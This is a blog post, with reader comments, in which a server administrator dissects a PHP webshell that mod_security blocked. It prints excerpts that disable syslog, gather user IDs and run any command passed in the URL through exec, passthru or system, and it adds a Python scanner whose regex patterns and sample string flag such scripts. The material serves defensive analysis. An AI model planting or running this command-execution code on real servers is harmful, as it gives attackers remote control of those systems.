Yesterday a compromised server was used to attempt to get into my box. Thankfully I have an operational mod_security install and a damn fine firewall that monitors the mod_security alerts. This is a vital thing to have, especially if you run any software that could be compromised. I also do daily and weekly checks of my server to make sure there isn't anything on it that shouldn't be.
There was a link referenced in the mod_security alerts that I took a look at, just out of curiosity. I was amazed at how simple the PHP code was, and how lethal it would have been on a compromised system. Here's a rundown of what I found, including some of the code.
The first thing that’s present in the requested file is the following code.
<?php
// Close the connection PHP's syslog() uses to the system logger.
closelog();
// Gather identity and environment details about the host.
$dono  = get_current_user();
$ver   = phpversion();
$login = posix_getuid();
$euid  = posix_geteuid();
$gid   = posix_getgid();
if ($chdir == "") $chdir = getcwd();
?>
The first PHP line closes off PHP's logging to the system log. This is bad because it means anything from this point on won't be logged, and we'd have a much harder time investigating the exploit if the server were compromised.
The next few lines gather various pieces of information about the system (the current user, PHP version, uid, euid, gid and working directory), which helps the attacker work out how best to get into your system.
<?php
// Choose the command-execution function according to the $fe parameter.
if ($fe == 1)   { $fe = "exec"; }
if ($fe == "")  { $fe = "passthru"; }
if ($fe == "2") { $fe = "system"; }
if (isset($chdir)) @chdir($chdir);
// Run the supplied command and capture its stdout and stderr into $output.
ob_start();
$fe("$cmd 2>&1");
$output = ob_get_contents();
ob_end_clean();
?>
This next chunk of code runs whatever command is passed to the script in the URL, using exec, passthru or system depending on the $fe parameter. Note that the script never initialises $fe, $cmd or $chdir itself, so it depends on PHP populating them straight from the request (register_globals).
The commands I saw via mod_security varied, but were mainly attempts to download further scripts to assist with the exploit.
The next part of the script then scans the file system to see what files and folders are writable. Here’s an excerpt.
echo "<b><font size=2 face=arial>List Writable Files</b> <br><br>";
if ($dir = opendir($chdir)) {
    while (($file = readdir($dir)) !== false) {
        // Report every regular file in the directory that the web server can write to.
        if (@is_writable($file) && @is_file($file)) {
            $file1 = fileowner($file);
            $file2 = fileperms($file);
            echo "<font color=red>$file1 - $file2 - $file </font><br>";
        }
    }
}
The next part of the script then attempts to write a trojan to the /tmp directory, called PHP/Chaploit or dc-connectback.c in my case: a nasty piece of work that essentially gives a backdoor into the server.
If the script manages to get this far, your server is most likely compromised, and you're going to spend a long time cleaning up the mess that gets made.
This just highlights how important it is to keep software up to date, keep on top of new mod_security rules and run a good firewall!
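As an added illustration (not part of the original post, and not the attacker's script), here is a small Python scanner that looks for the combination of indicators the dissected script exhibits, the sort of check that fits into the daily file-system review mentioned at the top. The indicator names, the scoring thresholds and the two sample files are my own constructions, the first modelled on the excerpts above.

```python
import os
import re
# Indicator patterns distilled from the script dissected above, each labelled so a hit is explainable.
INDICATORS = {
    "syslog_disabled": re.compile(r"\bcloselog\s*\("),
    "recon_ids": re.compile(r"\bposix_get(?:e?uid|gid)\s*\("),
    "exec_family": re.compile(r"[\"'](?:exec|passthru|system|shell_exec)[\"']"),
    "dynamic_exec": re.compile(r"\$\w+\s*\(\s*[\"'][^\"']*\$\w+[^\"']*2>&1"),
    "writable_scan": re.compile(r"\bis_writable\s*\("),
    "tmp_drop": re.compile(r"/tmp/[\w./-]+"),
}

def scan_php_source(src):
    """Return {indicator: hit count} for every indicator present in src."""
    hits = {}
    for name, pattern in INDICATORS.items():
        count = len(pattern.findall(src))
        if count:
            hits[name] = count
    return hits

def classify(hits):
    """Score the indicator mix: closelog() or is_writable() alone is common in real code."""
    if "dynamic_exec" in hits or len(hits) >= 3:
        return "likely-webshell"
    if len(hits) >= 2:
        return "suspicious"
    return "clean"

def scan_tree(root):
    """Walk a document root and report every PHP file that is not clean."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, errors="replace") as fh:
                hits = scan_php_source(fh.read())
            verdict = classify(hits)
            if verdict != "clean":
                findings[path] = (verdict, hits)
    return findings

# Constructed samples: one modelled on the excerpts above, one an ordinary installer check that must not be flagged.
WEBSHELL = '''<?php closelog(); $login = posix_getuid(); $gid = posix_getgid();
if ($fe == 1) { $fe = "exec"; } if ($fe == "") { $fe = "passthru"; } if ($fe == "2") { $fe = "system"; }
ob_start(); $fe("$cmd 2>&1"); if (@is_writable($file)) echo $file; $fp = fopen("/tmp/dc-connectback.c", "w"); ?>'''
BENIGN = '''<?php if (!is_writable("config.php")) die("config.php must be writable"); ?>'''
```

Run scan_tree("/var/www") (or whatever your document root is) from a cron job and diff the findings against the previous run; a new "likely-webshell" entry is worth an immediate look.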
Shucks. Thwarted again by you meddling kids! *shakes fist*
Nah seriously, was this your home PC or the SDJL server?
Thanks for the code - good to know.
Phil: This was on the “SDJL Server”! No one got in, but I was intrigued by the script they tried to use to get in.
chief: No worries. Always useful to know!